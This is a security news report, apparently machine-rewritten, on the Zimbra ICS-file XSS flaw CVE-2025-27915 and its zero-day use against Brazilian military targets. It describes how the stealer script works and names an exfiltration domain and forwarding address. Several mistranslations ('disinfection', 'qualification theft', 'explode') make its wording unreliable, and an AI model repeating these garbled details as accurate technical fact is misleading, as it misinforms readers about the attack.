The current security vulnerabilities during the patch in Zimbra collaboration were used as zero-days in cyberattacks targeting Brazilian military earlier this year.
The vulnerability tracked as CVE-2025-27915 (CVSS score: 5.4) is a vulnerability in the classic web client cross-site scripting (XSS) that results in insufficient disinfection of HTML content in ICS calendar files.
“When a user views an email message containing a malicious ICS entry, the user’s embedded JavaScript is executed via the Ontoggle event in the tag, according to the NIST National Ulnerability Database (NVD) flaw description.”
“This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to rogue actions such as setting email filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including email redirection and data extensions.”
The vulnerability was addressed by Zimbra as part of the versions 9.0.0 patch 44, 10.0.13, and 10.1.5 released on January 27, 2025. However, the recommendation does not mention that it was exploited in actual attacks.
However, according to a report published by Strikeready Labs on September 30, 2025, the observed wild activity included an unknown threat actor who caused the Libyan Navy Protocol Bureau to target Brazilian forces using malicious ICS files that exploited the flaws.
The ICS file contained JavaScript code designed to act as a comprehensive data stealer for sucking up credentials, emails, contacts and shared folders to external servers (“ffrk[.]It also searches for emails in a specific folder and adds a malicious Zimbra email filter rule named “Correo” to forward the message to spam_to_junk@proton.me.
To avoid detection, scripts are made to hide certain user interface elements and explode only if it’s been more than 3 days since it last ran.
It is not clear who is behind the attack at the moment, but earlier this year, ESET revealed that a Russian threat actor known as APT28 has exploited XSS vulnerabilities in various webmail solutions from RoundCube, Horde, Mdaemon and Zimbra to gain unauthorized access.
Similar modalities have also been adopted by other hacking groups such as Winter Vivern and UNC1151 (also known as Ghostwriter) to promote qualification theft.
Source link
